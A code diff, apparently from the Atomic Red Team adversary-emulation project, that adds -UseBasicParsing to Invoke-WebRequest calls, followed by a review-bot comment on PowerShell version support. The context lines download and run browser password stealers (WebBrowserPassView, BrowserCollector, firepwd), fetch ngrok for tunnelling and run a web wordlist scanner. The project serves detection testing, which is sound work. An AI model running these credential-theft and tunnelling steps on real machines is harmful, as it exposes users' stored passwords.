@@ -92,7 +92,7 @@ atomic_tests: get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null $installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" - Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi + Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi -UseBasicParsing msiexec /i $installer /qn Start-Process -FilePath "chrome.exe" Stop-Process -Name "chrome" @@ -118,7 +118,7 @@ atomic_tests: get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null $installer = "PathToAtomicsFolder\..\ExternalPayloads\OperaStandaloneInstaller.exe" - Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\OperaStandaloneInstaller.exe" https://get.geo.opera.com/pub/opera/desktop/82.0.4227.43/win/Opera_82.0.4227.43_Setup.exe + Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\OperaStandaloneInstaller.exe" https://get.geo.opera.com/pub/opera/desktop/82.0.4227.43/win/Opera_82.0.4227.43_Setup.exe -UseBasicParsing Start-Process $installer -ArgumentList '/install /silent /launchopera=1 /setdefaultbrowser=0' Start-Sleep -s 180 Stop-Process -Name "opera" 
@@ -232,7 +232,7 @@ atomic_tests: if (get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" -erroraction silentlycontinue) {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://ftp.mozilla.org/pub/firefox/releases/98.0/win64/en-US/Firefox%20Setup%2098.0.msi" -outfile "PathToAtomicsFolder\..\ExternalPayloads\firefox.msi" + Invoke-WebRequest "https://ftp.mozilla.org/pub/firefox/releases/98.0/win64/en-US/Firefox%20Setup%2098.0.msi" -outfile "PathToAtomicsFolder\..\ExternalPayloads\firefox.msi" -UseBasicParsing msiexec.exe /i "PathToAtomicsFolder\..\ExternalPayloads\firefox.msi" /quiet sleep -s 30 start-process "$env:programfiles\Mozilla Firefox\firefox.exe". @@ -266,7 +266,7 @@ atomic_tests: if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null - Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}" + Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}" -UseBasicParsing - description: | Pycryptodome library must be installed prereq_command: | 
@@ -408,7 +408,7 @@ atomic_tests: if (Test-Path "#{webbrowserpassview_path}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\T1555.003\bin\" -ErrorAction ignore -Force | Out-Null - Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1555.003/bin/WebBrowserPassView.exe -OutFile "#{webbrowserpassview_path}" + Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1555.003/bin/WebBrowserPassView.exe -OutFile "#{webbrowserpassview_path}" -UseBasicParsing executor: command: | Start-Process "#{webbrowserpassview_path}" @@ -432,7 +432,7 @@ atomic_tests: get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null $installer = "PathToAtomicsFolder\..\ExternalPayloads\FirefoxStubInstaller.exe" - Invoke-WebRequest -OutFile $installer "https://download.mozilla.org/?product=firefox-stub&os=win&lang=en-US" + Invoke-WebRequest -OutFile $installer "https://download.mozilla.org/?product=firefox-stub&os=win&lang=en-US" -UseBasicParsing Start-Process -FilePath $installer -Wait Stop-Process -Name "firefox" - description: | 
@@ -441,14 +441,14 @@ atomic_tests: if (Test-Path "PathToAtomicsFolder\T1555.003\bin\BrowserCollector.exe") {exit 0} else {exit 1} get_prereq_command: |- New-Item -Type Directory "PathToAtomicsFolder\T1555.003\bin\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://github.com/SaulBerrenson/BrowserStealer/releases/download/1.0.0.4/BrowserCollector_x64.exe" -Outfile: "PathToAtomicsFolder\T1555.003\bin\BrowserCollector.exe" + Invoke-WebRequest "https://github.com/SaulBerrenson/BrowserStealer/releases/download/1.0.0.4/BrowserCollector_x64.exe" -Outfile: "PathToAtomicsFolder\T1555.003\bin\BrowserCollector.exe" -UseBasicParsing - description: | Login Data file that is a copy of a Firefox Login Data that contains credentials for the tool to "steal." Must exist at the specified path. prereq_command: |- if (Test-Path "PathToAtomicsFolder\T1555.003\src\key4.db") {exit 0} else {exit 1} get_prereq_command: |- - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/key4.db?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\key4.db" - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/logins.json?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\logins.json" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/key4.db?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\key4.db" -UseBasicParsing + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/logins.json?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\logins.json" -UseBasicParsing executor: command: | $profile = (Gci -filter "*default-release*" -path $env:Appdata\Mozilla\Firefox\Profiles\).FullName 
@@ -488,7 +488,7 @@ atomic_tests: get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null $installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" - Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi + Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi -UseBasicParsing msiexec /i $installer /qn Start-Process -FilePath "chrome.exe" Stop-Process -Name "chrome" diff --git a/atomics/T1560.001/T1560.001.yaml b/atomics/T1560.001/T1560.001.yaml index dbc7893d..5824799f 100644 --- a/atomics/T1560.001/T1560.001.yaml +++ b/atomics/T1560.001/T1560.001.yaml @@ -346,7 +346,7 @@ atomic_tests: if (Test-Path "#{plink_file}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" -UseBasicParsing executor: command: | # Extract line with IP address from the syslog configuration output diff --git a/atomics/T1562.010/T1562.010.yaml b/atomics/T1562.010/T1562.010.yaml index 4fd651fa..5e6e24e4 100644 --- a/atomics/T1562.010/T1562.010.yaml +++ b/atomics/T1562.010/T1562.010.yaml 
@@ -74,7 +74,7 @@ atomic_tests: if (Test-Path "#{plink_file}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" -UseBasicParsing executor: command: | echo "" | "#{plink_file}" "#{vm_host}" -ssh -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}" diff --git a/atomics/T1564.006/T1564.006.yaml b/atomics/T1564.006/T1564.006.yaml index 71057a44..0a60c7b7 100644 --- a/atomics/T1564.006/T1564.006.yaml +++ b/atomics/T1564.006/T1564.006.yaml @@ -25,14 +25,14 @@ atomic_tests: if (Test-Path "#{msi_file_path}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{msi_file_path}") -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/Virtualbox_52.msi" -OutFile "#{msi_file_path}" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/Virtualbox_52.msi" -OutFile "#{msi_file_path}" -UseBasicParsing - description: | CAB file must exist on disk at specified location (#{cab_file_path}) prereq_command: | if (Test-Path "#{cab_file_path}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{cab_file_path}") -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/common.cab" -OutFile "#{cab_file_path}" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/common.cab" -OutFile "#{cab_file_path}" -UseBasicParsing - description: | Old version of Virtualbox must be installed prereq_command: | 
diff --git a/atomics/T1572/T1572.yaml b/atomics/T1572/T1572.yaml index f9dd1e22..1523e5e0 100644 --- a/atomics/T1572/T1572.yaml +++ b/atomics/T1572/T1572.yaml @@ -134,7 +134,7 @@ atomic_tests: if (Test-Path C:\Users\Public\ngrok) {exit 0} else {exit 1} get_prereq_command: | New-Item -Path C:\Users\Public\ngrok -ItemType Directory | Out-Null - Invoke-WebRequest #{download} -OutFile C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip + Invoke-WebRequest #{download} -OutFile C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip -UseBasicParsing Expand-Archive C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip -DestinationPath C:\Users\Public\ngrok executor: command: | diff --git a/atomics/T1595.003/src/WebServerScan.ps1 b/atomics/T1595.003/src/WebServerScan.ps1 index b0e15132..c525135e 100644 --- a/atomics/T1595.003/src/WebServerScan.ps1 +++ b/atomics/T1595.003/src/WebServerScan.ps1 @@ -5,7 +5,7 @@ function Test-Target { ) try { - Invoke-WebRequest -Uri $Target -ErrorAction Stop -TimeoutSec $Timeout -SkipHttpErrorCheck + Invoke-WebRequest -Uri $Target -ErrorAction Stop -TimeoutSec $Timeout -SkipHttpErrorCheck -UseBasicParsing return $true } catch { @@ -31,7 +31,7 @@ function Invoke-WordlistScan { foreach ($Word in $Wordlist) { $Url = $Target + "/" + $Word - $Response = Invoke-WebRequest -Uri "$Url" -Method HEAD -ErrorAction SilentlyContinue -TimeoutSec $Timeout -SkipHttpErrorCheck + $Response = Invoke-WebRequest -Uri "$Url" -Method HEAD -ErrorAction SilentlyContinue -TimeoutSec $Timeout -SkipHttpErrorCheck -UseBasicParsing if ($Response.StatusCode -ge 200 -and $Response.StatusCode -lt 400) { $Results += $Url
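Review bot: `-UseBasicParsing` has no effect in Test-Target: the call already passes `-SkipHttpErrorCheck`, which exists only in PowerShell 7 and later, and from PowerShell 6 on basic parsing is the only mode and the switch is a deprecated no-op. On Windows PowerShell 5.1 the call still fails on the unrecognised `-SkipHttpErrorCheck` parameter, so if the patch is meant to buy 5.1 compatibility this file needs a different fix: drop `-SkipHttpErrorCheck` and read non-2xx codes from `$_.Exception.Response.StatusCode` in the `catch`. A comment above the call stating the floor, e.g. `# Requires PowerShell 7+: -SkipHttpErrorCheck`, would make the constraint explicit. The second hunk, in Invoke-WordlistScan, has the same combination and continues past the end of this view.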